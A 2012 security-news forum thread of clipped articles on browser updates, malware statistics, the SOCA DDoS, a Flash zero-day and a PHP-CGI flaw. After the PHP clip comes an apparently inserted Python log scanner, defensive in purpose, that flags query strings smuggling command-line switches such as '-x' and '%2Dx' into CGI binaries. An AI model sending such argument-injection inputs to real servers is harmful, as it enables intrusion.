
Forum Thread: Daily CYBERCLIPS May

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Open Discussions

This thread has been marked as locked.
mogs Daily CYBERCLIPS May
Expert Contributor 1st May, 2012 21:20
Ranking: 2265
Posts: 6,266
User Since: 22nd Apr, 2009
System Score: 100%
Location: UK

Twentieth Edition.

Thank you for the support. Hope you find something of value/interest in the new thread. The new INDEX thread will follow shortly.
Please refrain from scoring on both threads.
Security is the mainstay of the thread with some related and varied topics.
Scroll down for the latest posts!!
Note that no entry/post should be taken as a personal recommendation, unless otherwise stated.
Please continue to keep CYBERCLIPS free of junk and unattractive to any contentious individuals.
* Keep patching : up to date : be Cybersafe ! *

--

mogs CClip 1
Expert Contributor 1st May, 2012 21:22
Stable Channel Update
Monday, April 30, 2012 | 13:38
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.168 on Windows, Mac, Linux and Chrome Frame.


Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[106413] High CVE-2011-3078: Use after free in floats handling. Credit to Google Chrome Security Team (Marty Barbella) and independent later discovery by miaubiz.
[117110] High CVE-2012-1521: Use after free in xml parser. Credit to Google Chrome Security Team (SkyLined) and independent later discovery by wushi of team509 reported through iDefense VCP (V-874rcfpq7z).
[117627] Medium CVE-2011-3079: IPC validation failure. Credit to PinkiePie.
[121726] Medium CVE-2011-3080: Race condition in sandbox IPC. Credit to Willem Pinckaers of Matasano.
[$1000] [121899] High CVE-2011-3081: Use after free in floats handling. Credit to miaubiz.

The bugs [106413], [117110] and [121899] were detected using AddressSanitizer.


Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 2
Expert Contributor 1st May, 2012 21:43
IE on a rebound, browser share data shows
Microsoft's IE gains usage share for third month in the first four of 2012

By Gregg Keizer
May 1, 2012 03:21 PM ET
Computerworld - Microsoft's Internet Explorer (IE) in April again gained usage share, the third time in the year's first four months, to stay well above the 50% mark and remain the world's top browser, a Web analytics company said today.

Google's Chrome's share also climbed in April, said Net Applications, ending that browser's three-month decline.

IE boosted its share by about three-tenths of a percentage point last month to average 54.1% in April. That returns IE to a mark comparable to its September 2011 share.

Since Jan.1, IE has increased its usage share by 2.2 percentage points for a 4% gain since the end of 2011. The turnaround has been IE's largest and longest since the browser began shedding share years ago to Firefox, then later, Chrome.

Microsoft has pinned its hopes almost entirely on IE9, the 2011 edition that runs only on Windows Vista and Windows 7.

Read more at :-
http://www.computerworld.com/s/article/9226753/IE_...

--
mogs CClip 3
Expert Contributor 1st May, 2012 21:47
Symantec: More Malware on Religious Sites Than Porn Sites

Pornographic Web sites are less likely to be infected than religious, automotive or health sites, according to the company.

By Jeff Goldman

According to Symantec's annual Internet Security Threat Report, religious and ideological Web sites have far more security threats per infected site than adult/pornographic Web sites.

"We hypothesize that this is because pornographic Web site owners already make money from the Internet and, as a result, have a vested interest in keeping their sites malware-free -- it's not good for repeat business," the report states.

"Pornography-themed Web sites have long had a reputation as the 'dark alleyways' of the Internet," writes Threatpost's Paul Roberts. "In fact, porn sites ranked tenth in the list of the top ten categories of Web sites that are most infected, after automotive themed sites (ranked 8th) and health and medicine sites (ranked 9th). Top on that list: blogs and Web communications, including religious Web sites. That was followed by personally hosted sites, business sites, shopping and education."

"The average number of threats found on religious sites was 115 (mostly fake antivirus software)," writes The Wall Street Journal's Ben Rooney. "By contrast, pornographic sites had less than a quarter, at around 25 threats per site. Of course, the number of pornographic sites is vastly greater than religious sites."

"Symantec measured an increase of more than 81 percent in malware in 2011 over 2010, while the number of malware variants increased by 41 percent," writes PCWorld's Daniel Ionescu. "On the flip side, spam volumes have decreased from 88.5 percent of all email in 2010 to 75.1 percent in 2011 -- thanks to law enforcement action which shut down the Rustock worldwide botnet that was responsible for sending out large amounts of spam."

http://www.esecurityplanet.com/malware/symantec-mo...

--
mogs CClip 4
Expert Contributor 1st May, 2012 21:51
Skype investigates tool that reveals users' IP addresses
Skype said the privacy-compromising issue is present in other peer-to-peer systems

By Jeremy Kirk | IDG News Service

Skype said Tuesday it is investigating a new tool that collects a person's last known IP address, a potential privacy-compromising issue.

Instructions posted on Pastebin on Thursday showed how a person's IP address could be shown without adding the targeted user as a contact by looking at the person's general information and log files.

Skype, which is owned by Microsoft, said in an email statement that "this is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are taking measures to help protect them."

Read more at :-
http://www.infoworld.com/d/security/skype-investig...

--
mogs CClip 5
Expert Contributor 1st May, 2012 21:54
Microsoft's Windows XP is still the most popular

It's hard to get users to migrate to Windows 7
By Lee Bell
Tue May 01 2012, 17:35
SOFTWARE HOUSE Microsoft's decade old operating system (OS) Windows XP is still the most popular, according to data released today by web analytics firm Net Applications.
Despite shedding users over the past year, Windows XP is still clinging onto a sizeable share of the market, with Net Applications' report showing only a minor drop in users to 46.08 per cent in April from 46.86 per cent in March.
Interestingly, the data also reflect an unusual rise-and-fall pattern in Windows XP's audience each month since last November.
Meanwhile, the study tells us that Windows 7 is continuing to grow in popularity with its most recent edition capturing a 38.67 per cent share of the market in April, up from 37.54 per cent in March.
Despite Windows XP's firm grip, Microsoft has been encouraging users and businesses to switch to Windows' most recent version, with relative success.
However, Microsoft will have to step up the message as a post on the Windows Team Blog announced last month that support for Windows XP will end in two years, causing panic among large enterprises that have to migrate thousands or tens of thousands of users, something that doesn't happen overnight.

Read more at :-
http://www.theinquirer.net/inquirer/news/2171792/m...

--
mogs CClip 6
Expert Contributor 1st May, 2012 22:03
“Search Engine Security” to Protect IE Users Against BlackHat SEO Links

Security solutions provider Zscaler revealed its latest product designed to aid Internet users while surfing the web. It’s called Search Engine Security (SES) and it’s meant to protect Internet Explorer customers against BlackHat SEO links in search engines.

SES already exists for Mozilla Firefox and Google Chrome, but now the company also made the Internet Explorer variant available.

The way SES works is simple. Normally, when cybercriminals hijack a website and alter it to serve their purposes, they use Referer and User-Agent headers to decide if the user should be directed to the malicious webpage or a harmless one.

If it’s installed in the web browser, SES ensures that each time the user accesses a link from Google, Yahoo! or Bing, the headers are modified so that the hijacked site sees him as not being human and does not redirect him to the malware-infested site.

Internauts who install SES will see a small piece of text at the top of the search engine result page which indicates if the feature is active or not.

The tool also allows customers to whitelist specific pages if they’re certain that they can’t cause any harm.

The control panel of the Internet Explorer version can be found in the Tools menu, under Search Engine Security options.

In the options menu, the user can activate the security feature for each search engine individually, he can set the Referer header, and add sites to the whitelist.

Internet users are advised to give SES a try, especially if they’re in the habit of using search engines on a regular basis.

Search Engine Security for Internet Explorer, Chrome and Firefox is available for download here.

http://news.softpedia.com/news/Search-Engine-Secur...

--
mogs CClip 7
Expert Contributor 2nd May, 2012 21:26
Dev Channel Update
Tuesday, May 1, 2012 | 23:14
Labels: Dev updates
The Dev channel has been updated to 20.0.1123.1 for Windows, Mac, and Chrome Frame. Linux will be updated tomorrow. This build contains following updates:

Updated V8 - 3.10.6.0
Fixed about:inducebrowsercrashforrealz (Issue: 124843)
[Windows] Visual refinements to the tab strip and toolbar icons, including a slightly wider new tab button (the “baby tab”) that is easier to click.
[Known Issues] Mouse over on apps/extensions makes place holder blank in web store. (Issue: 125777)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 8
Expert Contributor 2nd May, 2012 21:33
Mozilla ponders major Firefox UI refresh
Same look and feel on all editions, including tablet, phone and Windows 8 Metro, may show later this year

By Gregg Keizer
May 2, 2012 12:47 PM ET
Mozilla is working on a revamp of Firefox to synchronize its various versions -- desktop, tablet, phone and Windows 8 Metro -- into a single visual style, according to documents posted by members of its user interface (UI) design team.

The project, which does not have a name, and the earlier blending of Mozilla's mobile and desktop design groups, is meant to bring more coherence to the various versions of the open-source browser.

"One of our major goals for the year [is] getting Firefox to feel more like one product -- more 'Firefoxy' -- across all our platforms, desktop to tablet to phone," Madhava Enro of the Mozilla UI design team, said in a post to his personal blog yesterday.

Enro posted a slideshow he and others used the week before to present their proposals at a company get-together. According to the presentation, some UI elements will be shared across all Firefox editions, among them a lean toward "softer texture" and smoother curves in the design.

Read more at :-
http://www.computerworld.com/s/article/9226787/Moz...

--
mogs CClip 9
Expert Contributor 2nd May, 2012 21:37
China Tops the List for Attack Traffic

Akamai's State of the Internet report identifies China as the top source of global attack traffic for the fourth quarter of 2011.

By Sean Michael Kerner

Every quarter for the last four years, content delivery network provider Akamai has issued a State of the Internet report that identifies the top sources of attack traffic, among other key metrics.

For the fourth quarter of 2011, China topped Akamai's list of the top originating countries for attack traffic. China was responsible for 13 percent of total attack traffic overall, an increase from 8.6 percent in the previous quarter. China takes over from Indonesia, which previously held the top spot at 14 percent, but fell to 7.6 percent in the fourth quarter.

Sandwiched between China and Indonesia in the rankings is the U.S., which was the source of 10 percent of all originating attack traffic in the quarter, up from 7.3 percent the previous quarter.

"China has held the top spot before, including in the first issue of the report in Q1 2008," said Akamai report author David Belson in an interview with eSecurity Planet. "I don't think that this portends a significant trend -- as we’ve seen over the past four years, the top country changes very frequently, and I expect that it will continue to do so in the future."

In 2011, the "top attack traffic source" title changed hands a number of times. In addition to China and Indonesia, Myanmar (first quarter) and Taiwan (second quarter) also held the top spots during the year. And at the end of 2010, Russia was reported to be in the top spot, accounting for 10 percent of all observed global attack traffic.

More at :-
http://www.esecurityplanet.com/hackers/china-tops-...

--
mogs CClip 10
Expert Contributor 2nd May, 2012 21:41
Scrambls puts control of social media back in the hands of users
Service allows users to keep their Facebook posts away from prying eyes -- including Google itself -- and lets corporations redact sensitive posts

By Robert Lemos | InfoWorld

Facebook, Twitter, and other social media sites may not be happy if a new service that launched in beta Wednesday takes off.

The service, scrambls, may be misspelled and lack a proper capital letter, but it aims to put the control of social-media posts back in the hands of users. Using scrambls, which is an add-on to major browsers, users can encrypt submissions to Facebook, Twitter, and other social networks, giving them fine-grained control over the scrambled text.

The service suggests interesting possibilities: Consumers could make their posts unreadable to anyone but themselves after three or six months, restrict access to certain posts to only family members, or block the social media site from using the posts for marketing purposes. Companies could create internal feeds unreadable by competitors and have an undo button to redact posts that leak sensitive information.

More at :-
http://www.infoworld.com/t/data-security/scrambls-...

--
mogs CClip 11
Expert Contributor 2nd May, 2012 21:50

Check Point relaunches ZoneAlarm antivirus as free product
Adds firewall and cloud protection
By John E Dunn | Techworld | 02 May 12

Check Point is offering its ZoneAlarm antivirus software as a free consumer product for the first time, adding the company's no-cost firewall to the bundle to offer all-in-one PC protection.

The thinking behind ZoneAlarm Free Antivirus + Firewall 2013 appears to be to pack more under the 'free' banner than its rivals, which stick pretty much to file scanning with a layer of realtime threat detection.

The combined product gets identity theft protection (first added to the paid software in 2008), an anti-phishing toolbar of the sort sometimes found at the browser layer, and free online backup for those who want an alternative to Google's Drive or Microsoft's SkyDrive.

It also comes with a download protection layer that monitors for known 'bad' files and what Check Point calls an "OS firewall", a way of monitoring for craftier threats that have somehow bypassed Windows itself.

However, the most interesting addition is the integration of the antivirus client with Check Point's free firewall, which uses Check Point's DefenseNet cloud system to analyse a PC's files against known bad examples.

An obvious question is what customers of the company's paid software - Internet Security Suite 2012 - will get over and above the free client and the answer seems to be extras such as parental controls, credit monitoring and the company's virtual browser technology.

More at :-
http://www.pcadvisor.co.uk/news/security/3355337/c...

--
mogs CClip 12
Expert Contributor 3rd May, 2012 03:49
Beta Channel Update
Wednesday, May 2, 2012 | 18:00
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.41 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 13
Expert Contributor 3rd May, 2012 12:14

IE 'silent' upgrade helps put newest browser on Windows
Stats show some Windows 7 and Vista users upgraded to IE9, but the new practice affected few XP users

By Gregg Keizer
May 2, 2012 04:05 PM ET
Computerworld - Microsoft's decision late last year to switch on "silent" upgrades for Internet Explorer (IE) has moved some Windows users to newer versions, but has had little, if any, impact on the oldest editions, IE6 and IE7, according to usage statistics.

In December 2011, Microsoft announced it would start automatically upgrading IE so that users ran the newest version suitable for their copy of Windows.

Under the plan, Windows XP users still on IE6 or IE7 would be updated to IE8, while Windows Vista or Windows 7 users running IE7 or IE8 would be pushed to IE9.

Previously, Microsoft has always asked users for their permission before upgrading IE from one version to the next, even if Windows' automatic updates was enabled.

First to get the automatic treatment, Microsoft said, would be Australia and Brazil, both guinea pigs for the January 2012 debut. The program would then be gradually expanded to other markets.

Yesterday, Microsoft declined to disclose what other countries, if any, had had the auto-upgrade switched on.

But in Australia and Brazil, the move shuffled share among some editions of IE, according to data from StatCounter, an Irish Web analytics company that publishes country-by-country usage share numbers for IE6, IE7, IE8 and IE9.

Read more at :-
http://www.computerworld.com/s/article/9226799/IE_...

--
mogs CClip 14
Expert Contributor 3rd May, 2012 21:02

OpenX Promises Fix for Rogue Ads Bug

Hackers are actively exploiting a dangerous security vulnerability in OpenX — an online ad-serving solution for Web sites — to run booby-trapped ads that serve malware and browser exploits across countless Web sites that depend on the solution.

Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts. That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software.

OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts.

Continue reading at :-
http://krebsonsecurity.com/category/latest-warning...

--
mogs CClip 15
Expert Contributor 3rd May, 2012 21:10
Botnet army flicks 'off' switch at UK crime agency website

Suspiciously close to Soca's shutdown of stolen-data shops
By Brid-Aine Parnell

Posted in Enterprise Security, 3rd May 2012 13:26 GMT
The UK's Serious Organised Crime Agency's website has been taken offline following a DDoS attack that started last night and is still going on.

SOCA decided to take the site down itself around 10pm last night to stop the distributed denial of service attack from bothering other connected websites.

"We took the site off temporarily to limit the impact of the DDoS on other clients who are hosted by the same service provider," a spokesperson told The Reg.

The botnet army has succeeded in getting the site offline, but not a whole lot else.

"Frankly, DDoS are a temporary inconvenience to website visitors but they're not a security risk to the organisation," the spokesperson said.

More at :-
http://www.theregister.co.uk/2012/05/03/soca_site_...

--
mogs CClip 16
Expert Contributor 3rd May, 2012 21:13
Google counters juice V8 Javascript engine

Beta channels primed
By Gavin Clarke

Posted in Developer, 3rd May 2012 14:59 GMT
Google’s V8 engine is getting more picky about the Javascript code it optimises to boost the performance of the search giant’s browser.

The current developer and beta channel releases of Chrome now come with a version of V8 that uses a new counters-based algorithm to decide which functions to optimise, Google has revealed.

Google claimed a 25 per cent increase in speed with Chrome 19, with the updated version of V8, compared to Chrome 18 on SunSpider performance tests.

V8 compiles Javascript in two stages: first to machine code and then optimising it, a fact that means V8 needs to predict what functions to optimise.

Traditionally V8 has stopped once every millisecond to look at the running functions and decide which should be optimised. As the Chromium blog put it: "A single millisecond can be a long time to wait before optimizing!"

The new V8 algorithm uses counters to keep track of how often Javascript functions are called and loops executed in a program. The Chromium blog said: “That way V8 is able to quickly gather fine-grained information about performance bottlenecks in a JavaScript program, and to make sure that the optimizing compiler's efforts are spent on those functions that deserve it most.” ®
http://www.theregister.co.uk/2012/05/03/chromium_v...

--
mogs CClip 17
Expert Contributor 3rd May, 2012 21:25
Government warns of increased cyber attack threat during Olympics

The government has warned that the UK is likely to come under attack by cyber criminals during the London Olympics this summer.
In a speech in Estonia, Cabinet Office minister Francis Maude said UK government computers are regularly targeted by foreign intelligence agencies or groups working on their behalf.
He said the government's objective was to make the UK more resilient to such types of attacks.
"This year's Olympics in the United Kingdom will not be immune to cyber attacks by those who would seek to disrupt the Games," he said.
"The Beijing Olympics saw 12 million cyber security incidents during their Olympics. We have rightly been preparing for some time - a dedicated unit will help guard the London Olympics against cyber attack - we are determined to have a safe and secure Games."
Maude referred to the £650m of funding the government has put aside to tighten its security for cyber attacks during the next four years, and the transformative national cyber security programme it has established.

More at :-
http://www.v3.co.uk/v3-uk/news/2172259/government-...

--
mogs CClip 18
Expert Contributor 4th May, 2012 17:15
Microsoft boots Chinese firm for leaking Windows exploit
Kicks Hangzhou DPTech out of MAPP after tracing proof-of-concept code leak

By Gregg Keizer
May 4, 2012 06:39 AM ET
Computerworld - Microsoft on Thursday identified a Chinese security partner as the source of a leak last March in its highly restricted vulnerability information-sharing program.

The company, Hangzhou DPTech Technologies, was tossed out of the Microsoft Active Protection Program (MAPP) for leaking the proof-of-concept exploit.

"During our investigation into the disclosure of confidential data shared with our Microsoft Active Protections Program (MAPP) partners, we determined that a member ... Hangzhou DPTech Technologies Co., Ltd., had breached our non-disclosure agreement (NDA)," Yunsun Wee, director of Microsoft's Trustworthy Computing group, wrote in a post to a company blog. "Microsoft takes breaches of our NDAs very seriously and has removed this partner from the MAPP Program."

More at :-
http://www.computerworld.com/s/article/9226877/Mic...

--
mogs CClip 19
Expert Contributor 4th May, 2012 17:18
Bloggers plead for Windows Live Writer's life
Microsoft says the tool 'works great' on Windows 8, but dodges questions on demise after Live brand is retired

By Gregg Keizer
May 3, 2012 05:08 PM
Computerworld - A Windows developer, upset at the likely demise of Windows Live Writer as part of Microsoft's move to retire the Live brand, has launched an online petition drive to save the tool.

On Wednesday, Microsoft announced it was retiring the Windows Live brand, and will replace it with a set of online consumer services targeting Windows 8, the operating system upgrade expected to launch later this year.

In a grid Microsoft published yesterday, Windows Live Writer was noticeably absent, leading users to conclude that the company was killing the blog publishing program.

More at :-
http://www.computerworld.com/s/article/9226850/Blo...

--
mogs CClip 20
Expert Contributor 4th May, 2012 17:21

Microsoft plans big May patch slate for next week
Schedules seven updates to patch 23 bugs in Windows, Office

By Gregg Keizer
May 3, 2012 03:00 PM
Computerworld - Microsoft today said it would ship seven security updates next week, three critical, to patch 23 bugs in Windows, Office and its Silverlight and .Net development platforms.

The number of patches -- nearly two dozen -- is higher than usual for an odd-numbered month; for some time, Microsoft has used an even-odd schedule, patching more vulnerabilities in the even months, when it also regularly updates Internet Explorer.

"May has been a light month, historically, very light," said Andrew Storms, director of security operations at nCircle Security, who tracks the number of patches and updates Microsoft issues each month.

In May 2011, Microsoft shipped two updates that patched three vulnerabilities. The year before, it delivered two updates that patched two bugs.

"So, this is a big number," said Storms.

The pace so far this year -- Microsoft's collections during the first five months have included seven, nine, six, six and seven updates -- puts to rest the idea that Microsoft still hews to a wave-and-trough practice.

More at :-
http://www.computerworld.com/s/article/9226846/Mic...

--
mogs CClip 21
Expert Contributor 4th May, 2012 17:27
Oracle urges removal of older Java versions due to security risks
Company points users to latest Java update, with most recent features, fixes, and performance improvements

By Paul Krill | InfoWorld

Oracle, in making Java Platform, Standard Edition (SE) 7 the default runtime environment for Java this week, is emphasizing that older versions of Java be removed for security purposes.

The company recommends updating to the latest version of Java, which contains the most recent features, fixes, and performance improvements. Along with that, older versions should be removed. "Keeping old and unsupported versions of Java on your system presents a serious security risk," Oracle said on Java.com. "Removing older versions of Java from your system ensures that Java applications will run with the most up-to-date security and performance improvements on your system."

[ Also on InfoWorld: Last week, Oracle released Java SE 7 Update 4 and JavaFX 2.1, including a Java Development Kit and JavaFX Software Development Kit for Mac OS X. | For more on Java, subscribe to InfoWorld's Enterprise Java newsletter. ]

Oracle offers instructions for removing older versions. Java, however, has been under fire lately in the security realm, with a Java-borne Trojan, called Flashback, affecting Apple Macs.

More at :-
http://www.infoworld.com/d/application-development...

--
mogs CClip 22
Expert Contributor 4th May, 2012 17:30
Critical PHP vulnerability exposes servers to data theft -- or worse
PHP Group releases updates to fix vulnerability that allows a remote attacker to easily pass command-line switches to servers through URLs

By Ted Samson | InfoWorld


A newly reported critical vulnerability in PHP enables would-be cyber criminals to steal source code or inject and run malware in PHP applications by adding command-line parameters to URLs. Fortunately, The PHP Group has announced updates to PHP that it says eliminate the vulnerability.

The vulnerability specifically affects the way PHP-CGI-based setups parse query string parameters from PHP files. FastCGI for PHP installations are not affected. The vulnerability can only be exploited if the HTTP server follows a fairly obscure part of the CGI spec, according to Eindbazen, the group of researchers that initially found the bug.

More at :-
http://www.infoworld.com/t/application-security/cr...

--
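
The query-string behaviour described in this clip can be looked for in web server access logs. The Python below is an added example (not from the article, The PHP Group or Eindbazen): it applies the CGI rule in RFC 3875 that a query string with no unencoded `=` is split on `+`, URL-decoded and handed to the script as command-line words, and flags requests where one of those words starts with `-`. The log lines, the `-x` switch and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cgi_argv_from_query(query):
    """Return the words a CGI server would pass as command-line arguments.

    RFC 3875 section 4.4: a query string that contains no unencoded '='
    is an "indexed" query; it is split on '+' and each word is URL-decoded.
    Any other query string produces no command-line arguments.
    """
    if not query or "=" in query:   # a raw '=' means ordinary key=value data
        return []
    return [unquote(word) for word in query.split("+") if word]


def find_switch_requests(log_lines):
    """Flag requests whose query would reach a CGI binary as a '-switch'.

    Returns a list of dicts with the 1-based line number, method, path and
    the decoded argument words. The RFC names GET and HEAD for indexed
    queries; every method is checked here as the conservative choice.
    """
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue                # not a parseable request line
        path, _, query = match.group("target").partition("?")
        argv = cgi_argv_from_query(query)
        # Decoding happens before the check, so "%2Dx" is caught as "-x".
        if any(word.startswith("-") for word in argv):
            hits.append({
                "line": line_no,
                "method": match.group("method"),
                "path": path,
                "argv": argv,
            })
    return hits


# Constructed sample log lines (documentation IP ranges, placeholder switch -x).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/May/2012:10:00:01 +0000] "GET /index.php?id=7&page=2 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [04/May/2012:10:00:05 +0000] "GET /search.php?security+news HTTP/1.1" 200 2048',
    '198.51.100.7 - - [04/May/2012:10:00:09 +0000] "GET /index.php?-x HTTP/1.1" 200 9001',
    '198.51.100.7 - - [04/May/2012:10:00:12 +0000] "GET /index.php?%2Dx+value HTTP/1.1" 200 9001',
    '203.0.113.5 - - [04/May/2012:10:00:20 +0000] "GET /page.php?note=-x HTTP/1.1" 200 300',
    '203.0.113.5 - - [04/May/2012:10:00:25 +0000] "GET /about.html HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in find_switch_requests(SAMPLE_LOG):
        print("line %(line)d: %(method)s %(path)s argv=%(argv)r" % hit)
```

A hit means the request would have reached a CGI binary with a leading-dash argument; whether the server was exposed still depends on it running PHP as CGI rather than FastCGI, as the article notes.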
mogs CClip 23
Expert Contributor 4th May, 2012 17:37
SOCA website still down after mystery cyber attack
Cause unknown, DDoS suspected

By John E Dunn | Computerworld UK | 04 May 12
The website of the UK's Serious Organised Crime Agency (SOCA) has been downed by what is starting to look like the most serious cyberattack ever to hit the site.

Reported as having been offline since Wednesday night (2 May), by Thursday morning the site had still not returned as expected, an unusually long blackout for such a high-profile website.

The site has been hit before, notably by alleged LulzSec hacker Ryan Cleary in June 2011, and will have found itself under some form of attack more or less every day since.

What has caused the latest downing is unknown. A DDoS attack is the most likely culprit but these do not usually take hours to deflect. A more serious incursion is starting to look at least possible; the outage is now even longer than that allegedly caused by Cleary.

More at :-
http://www.pcadvisor.co.uk/news/security/3355753/s...

--
mogs CClip 24
Expert Contributor 4th May, 2012 17:41
John McAfee, antivirus pioneer, arrested by Belize police
Detained by anti-gang police who shot dog, reports say

By John E Dunn | Techworld | 04 May 12
McAfee antivirus founder John McAfee is reportedly taking legal advice after a raid on his Belize home by police resulted in the software entrepreneur's arrest and the death of his pet dog.

The raid in the early morning of 1 May by the country's armed 'Gang Suppression Unit' (GSU) allegedly involved the doors to McAfee's house being smashed down, his property ransacked, and his dog shot.

After searching the house for drugs and firearms and handcuffing him and his 12 employees, the police detained McAfee for a number of hours before releasing him at 2am the following morning.

The police haven't given a reason for the raid but did reportedly find a cache of weapons including 12 gauge shotguns, handguns, rifles with scopes and ammunition. McAfee said he'd presented permits for all but one of the weapons which were for his company's security.

More at :-
http://www.pcadvisor.co.uk/news/security/3355796/j...

--
mogs CClip 25
Expert Contributor 4th May, 2012 18:56
Ministry of Defence security chief admits organisation hit by cyber attacks

The Ministry of Defence's (MoD) security chief has warned that the UK needs to take urgent measures to combat the growing threat of cyber attacks, revealing the organisation has itself recently been breached.
Major general Jonathan Shaw made the claim during an interview with The Guardian, reporting there is an increasing number of attacks now targeting the UK.
"The number of serious incidents is quite small, but it is there. The likelihood is there are problems in there [MoD networks] we don't know about," he said.
Shaw suggested that the MoD will have to seek aid from young people to effectively combat criminals and hostile nations' cyber attacks.
"My generation, we are far too old for this; it is not what we have grown up with. Our natural recourse is to reach for a pen and paper. And although we can set up structures, we really need to be on listening mode for this one," he said.

More at :-
http://www.v3.co.uk/v3-uk/news/2172735/ministry-de...

--
mogs CClip 26
Expert Contributor 5th May, 2012 05:57
Download Google Chrome 20.0.1123.4 Dev, Chrome 21 Around the Corner

There's a good two weeks until Google Chrome 20 is set to graduate to the beta channel, but it seems Google has already started preparing Chrome 20.0.1123.* for this.

The latest update to the dev channel, Chrome 20.0.1123.4, is a bug-fixing release and that's what all the future ones will be until Chrome 21 enters the dev channel.

There's a fix for the Pepper version of the Flash Player for Linux. Chrome is getting ready to make the switch to the PPAPI Flash Player replacing the old NPAPI one. A rendering bug, which left the process running even after navigating away, has now been fixed.

Chrome 21 should be landing as part of the Chromium daily builds and the Canary channel soon, if 1123 is the branch Google chooses to move up to the beta channel and then to the stable release.

http://news.softpedia.com/news/Download-Google-Chr...

--
mogs CClip 27
Expert Contributor 5th May, 2012 06:03
IP Address Not Enough to Accuse Users of Piracy, Judge Rules

In a recent copyright infringement case filed by an adult film studio, the judge has made a ruling that will probably affect many lawsuits in which several defendants are accused of illegally downloading content. Judge Gary Brown has ruled that a simple IP address can’t be associated with a single person.

The recent mass lawsuits against individuals who were suspected of committing copyright infringement were basically the same. The rights holder would record the IP addresses of those who downloaded their property, after which he would try to obtain a court order to force ISPs to reveal the identities that were hiding behind it.

Of course, with the increase in popularity of Wi-Fi routers, the IP the person was associated with in many cases didn’t match the actual culprit.

Recent studies have shown that many Wi-Fi routers are not secured, and even if they are, there are always tricks that can be utilized to connect to them. Not to mention the fact that in a household several people may be using the same Internet connection, including visitors.

According to TorrentFreak, New York Magistrate Judge Gary Brown is well aware of these factors so he made a few recommendations, even advising other judges to dismiss future cases that are based solely on IP addresses.

More at :-
http://news.softpedia.com/news/IP-Address-Not-Enou...

--
mogs CClip 28
Expert Contributor 5th May, 2012 06:10
Adobe patches new Flash zero-day bug with emergency update
In-the-wild attacks target Windows' Internet Explorer, says company

By Gregg Keizer
May 4, 2012 02:19 PM
Computerworld - Adobe today warned that hackers are exploiting a critical vulnerability in its popular Flash Player program, and issued an emergency update to patch the bug.

"There are reports that the vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message," the Friday advisory said.

Although all editions of Flash Player contain the vulnerability and should be patched, the active exploit is targeting only users of Microsoft's Internet Explorer (IE).

Flash Player for IE is an ActiveX plug-in, the Microsoft-only standard; other browsers, including Firefox and Chrome, use a different plug-in structure.

The update was pegged with Adobe's priority rating of "1," used to label patches for actively-exploited vulnerabilities or bugs that will likely be exploited. For such updates, Adobe recommends that customers install the new version within 72 hours.

Adobe disclosed relatively few details about the vulnerability -- its usual practice -- other than to label it an "object confusion vulnerability," note the Common Vulnerabilities & Exposures ID of CVE-2012-0779, and acknowledge that triggering the bug "could cause the application to crash and potentially allow an attacker to take control of the affected system."

It's unclear how extensive the active attacks are, although Adobe's calling them "targeted" hints at a low volume of attempts aimed at specific individuals or companies.

Today's Flash Player update was the fourth this year -- the latest before Friday was on March 28 -- putting the frequently-patched program on about the same pace as last year, when Adobe issued a total of nine Flash security updates.

In March, Adobe addressed the frequent updating pain point -- at least for Windows users -- by shipping Flash Player 11.2, which uses a silent, background update mechanism. The silent update is supposed to kick in in some situations to automatically patch the plug-in in IE, Firefox, Safari and Opera on Windows without notifying or bothering users.

At the time, Adobe said it would switch on silent updates "on a case-by-case basis," but hinted that the service would primarily be used to distribute patches for zero-day vulnerabilities, such as today's.

Friday, Adobe confirmed that it has, in fact, enabled Flash silent updates for Windows in this instance.

A Computerworld Windows 7 system, however, was not silently updated to 11.2.202.235, the patched version, within an hour of booting the PC, the interval the tool uses to check for new updates. Adobe's explanation: It did not begin serving Flash Player via silent update until about 10:30 a.m. PT, after the Windows 7 machine had pinged Adobe's servers. If the silent updater receives no response from Adobe, it waits 24 hours before trying again.

More at :-
http://www.computerworld.com/s/article/9226892/Ado...

--
mogs CClip 29
Expert Contributor 5th May, 2012 11:10
Study Finds Child Identity Theft on the Rise

According to AllClear ID, identity theft affecting children ages five and under grew by 105 percent since last year.

By Jeff Goldman

According to a recent study from AllClear ID, fully 10.7 of children are victims of identity theft, making them 35 times more likely than adults to have their identities stolen.

"The new data also showed that identity theft is increasing most quickly in young children," Help Net Security reports. "In fact, identity theft among children ages 5 and under grew 105 percent since last year -- the highest growth rate of any age group -- while 26 percent of children targeted were between the ages of six and ten, a 34 percent increase."

"Meanwhile, growth rates for kids over 11 remained flat, which indicates that criminals are now going after the SSNs of ever younger children," writes TechCrunch's Sarah Perez.

